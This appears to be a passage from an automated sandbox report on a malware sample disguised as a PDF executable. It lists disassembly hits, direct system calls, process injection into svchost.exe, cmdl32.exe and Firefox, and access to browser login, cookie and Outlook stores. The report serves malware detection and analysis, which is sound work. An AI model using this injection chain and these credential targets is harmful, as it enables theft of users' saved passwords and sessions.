Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03656962 mov eax, dword ptr fs:[00000030h] 9_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03656962 mov eax, dword ptr fs:[00000030h] 9_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0367096E mov eax, dword ptr fs:[00000030h] 9_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0367096E mov edx, dword ptr fs:[00000030h] 9_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0367096E mov eax, dword ptr fs:[00000030h] 9_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D4978 mov eax, dword ptr fs:[00000030h] 9_2_036D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036D4978 mov eax, dword ptr fs:[00000030h] 9_2_036D4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036BC97C mov eax, dword ptr fs:[00000030h] 9_2_036BC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B0946 mov eax, dword ptr fs:[00000030h] 9_2_036B0946
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03704940 mov eax, dword ptr fs:[00000030h] 9_2_03704940
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B892A mov eax, dword ptr fs:[00000030h] 9_2_036B892A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C892B mov eax, dword ptr fs:[00000030h] 9_2_036C892B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE908 mov eax, dword ptr fs:[00000030h] 9_2_036AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036AE908 mov eax, dword ptr fs:[00000030h] 9_2_036AE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036BC912 mov eax, dword ptr fs:[00000030h] 9_2_036BC912
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03628918 mov eax, dword ptr fs:[00000030h] 9_2_03628918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03628918 mov eax, dword ptr fs:[00000030h] 9_2_03628918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036BE9E0 mov eax, dword ptr fs:[00000030h] 9_2_036BE9E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036629F9 mov eax, dword ptr fs:[00000030h] 9_2_036629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036629F9 mov eax, dword ptr fs:[00000030h] 9_2_036629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C69C0 mov eax, dword ptr fs:[00000030h] 9_2_036C69C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 9_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 9_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 9_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 9_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 9_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0363A9D0 mov eax, dword ptr fs:[00000030h] 9_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036649D0 mov eax, dword ptr fs:[00000030h] 9_2_036649D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036FA9D3 mov eax, dword ptr fs:[00000030h] 9_2_036FA9D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h] 9_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h] 9_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h] 9_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h] 9_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h] 9_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h] 9_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h] 9_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h] 9_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h] 9_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h] 9_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h] 9_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h] 9_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036429A0 mov eax, dword ptr fs:[00000030h] 9_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036309AD mov eax, dword ptr fs:[00000030h] 9_2_036309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036309AD mov eax, dword ptr fs:[00000030h] 9_2_036309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B89B3 mov esi, dword ptr fs:[00000030h] 9_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B89B3 mov eax, dword ptr fs:[00000030h] 9_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036B89B3 mov eax, dword ptr fs:[00000030h] 9_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036BE872 mov eax, dword ptr fs:[00000030h] 9_2_036BE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036BE872 mov eax, dword ptr fs:[00000030h] 9_2_036BE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C6870 mov eax, dword ptr fs:[00000030h] 9_2_036C6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036C6870 mov eax, dword ptr fs:[00000030h] 9_2_036C6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03642840 mov ecx, dword ptr fs:[00000030h] 9_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03660854 mov eax, dword ptr fs:[00000030h] 9_2_03660854
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03634859 mov eax, dword ptr fs:[00000030h] 9_2_03634859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03634859 mov eax, dword ptr fs:[00000030h] 9_2_03634859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03652835 mov eax, dword ptr fs:[00000030h] 9_2_03652835
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 6_2_004238DA
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0041F250 SetUnhandledExceptionFilter, 6_2_0041F250
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_0041A208
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00417DAA

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: svchost.exe PID: 7336, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: EyHLOQmzGKBL.exe PID: 2340, type: MEMORYSTR
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtWriteVirtualMemory: Direct from: 0x77762E3C Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtMapViewOfSection: Direct from: 0x77762D1C Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtNotifyChangeKey: Direct from: 0x77763C2C Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtCreateMutant: Direct from: 0x777635CC Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtResumeThread: Direct from: 0x777636AC Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtProtectVirtualMemory: Direct from: 0x77757B2E Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtQuerySystemInformation: Direct from: 0x77762DFC Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtAllocateVirtualMemory: Direct from: 0x77762BFC Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtReadFile: Direct from: 0x77762ADC Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtDelayExecution: Direct from: 0x77762DDC Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtWriteVirtualMemory: Direct from: 0x7776490C Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtQueryInformationProcess: Direct from: 0x77762C26 Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtResumeThread: Direct from: 0x77762FBC Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtCreateUserProcess: Direct from: 0x7776371C Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtSetInformationThread: Direct from: 0x777563F9 Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtOpenKeyEx: Direct from: 0x77763C9C Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtSetInformationThread: Direct from: 0x77762B4C Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtQueryAttributesFile: Direct from: 0x77762E6C Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtReadVirtualMemory: Direct from: 0x77762E8C Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtCreateKey: Direct from: 0x77762C6C Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtQuerySystemInformation: Direct from: 0x777648CC Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtAllocateVirtualMemory: Direct from: 0x777648EC Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtQueryVolumeInformationFile: Direct from: 0x77762F2C Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtOpenSection: Direct from: 0x77762E0C Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtDeviceIoControlFile: Direct from: 0x77762AEC Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtQueryValueKey: Direct from: 0x77762BEC Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtQueryInformationToken: Direct from: 0x77762CAC Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtTerminateThread: Direct from: 0x77762FCC Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtCreateFile: Direct from: 0x77762FEC Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtOpenFile: Direct from: 0x77762DCC Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtOpenKeyEx: Direct from: 0x77762B9C Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtSetInformationProcess: Direct from: 0x77762C5C Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe NtProtectVirtualMemory: Direct from: 0x77762F9C Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmdl32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: NULL target: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: NULL target: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Thread register set: target process: 7836 Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Thread APC queued: target process: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: BFF008 Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00436CD7 LogonUserW, 6_2_00436CD7
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 6_2_0040D590
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 6_2_00434418
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event, 6_2_0043333C
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Product Data Specifications_PDF.exe" Jump to behavior
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe Process created: C:\Windows\SysWOW64\cmdl32.exe "C:\Windows\SysWOW64\cmdl32.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 6_2_00446124
Source: Product Data Specifications_PDF.exe, EyHLOQmzGKBL.exe, 0000000B.00000000.1684358268.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3157562461.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158649189.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: EyHLOQmzGKBL.exe, 0000000B.00000000.1684358268.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3157562461.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158649189.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: EyHLOQmzGKBL.exe, 0000000B.00000000.1684358268.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3157562461.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158649189.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: ?Program Manager
Source: EyHLOQmzGKBL.exe, 0000000B.00000000.1684358268.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3157562461.0000000001A51000.00000002.00000001.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158649189.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: Product Data Specifications_PDF.exe Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW, 6_2_004720DB
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00472C3F GetUserNameW, 6_2_00472C3F
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 6_2_0041E364
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 6_2_0040E500

Stealing of Sensitive Information

barindex
Source: Yara match File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\cmdl32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmdl32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: Product Data Specifications_PDF.exe Binary or memory string: WIN_XP
Source: Product Data Specifications_PDF.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 